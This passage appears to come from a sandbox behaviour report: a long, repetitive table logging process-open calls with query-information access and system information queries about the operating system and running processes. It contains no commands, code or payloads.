| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
